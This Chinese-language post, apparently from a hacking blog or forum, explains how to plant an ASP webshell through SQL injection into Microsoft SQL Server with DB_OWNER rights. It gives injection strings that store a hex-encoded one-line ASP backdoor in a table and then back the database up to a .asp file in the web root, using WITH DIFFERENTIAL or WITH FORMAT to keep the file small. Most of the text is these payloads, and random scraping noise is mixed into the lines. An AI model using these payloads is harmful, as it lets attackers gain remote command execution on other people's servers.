DB_OWNER权限得到webshell的改进办法

admin

DB_OWNER权限得到webshell的两点改进:
# t% s* Q, ]3 O; @, M4 b- l
减少备份文件大小，得到可执行的webshell成功率提高不少
1 r$ Y: x1 l  W1 v  u( U" k一利用差异备份
加一个参数WITH DIFFERENTIAL

4 g( q% _" @8 U7 ?9 o# Y- L0 L1
' r# ?1 S; i2 s6 m3 k/ c5 p2
3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
create table [dbo].[xiaolu] ([cmd] [image]);
1 u5 P, X4 T$ m# G) [7 iinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
* d- r5 @9 [/ a- d$ @declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL
: H2 }, O! s. ?3 C
8 f& p8 W, e+ ^; v二利用完全FORMAT
加一个参数WITH FROMAT
6 J7 {" M! b2 D+ D/ G有些页面对数据库要执行几次，而备份又默认是每次都以追加的方式，如果一个注入点对数据库有几次操作，而备份的文件就 几倍的增加，所以
3 |- o0 ~9 \, Q" K+ @) `! [
4 b# n3 p; ~* ~; ?1
2
5 j2 Q9 A3 l+ m3
4
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
. a1 G, \! Y8 B; T& e4 `create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
( b4 T, e- a6 p) {) `7 jdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT

$ T1 O* n' ~  a4 @2 m. `总的来说就是那么简单几句,下面以备份数据库model为例子
: u8 O5 B3 d# `* l* Z6 X& a1
0 N" q# ?* {! P3 \3 J' s
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
" Z1 F& j- }$ _% O- T
2

0 @# ]' m& q8 g$ P1 m" X6 ^9 G' S, g1
id=1;backup database model to disk='你的路径‘ with differential,format;--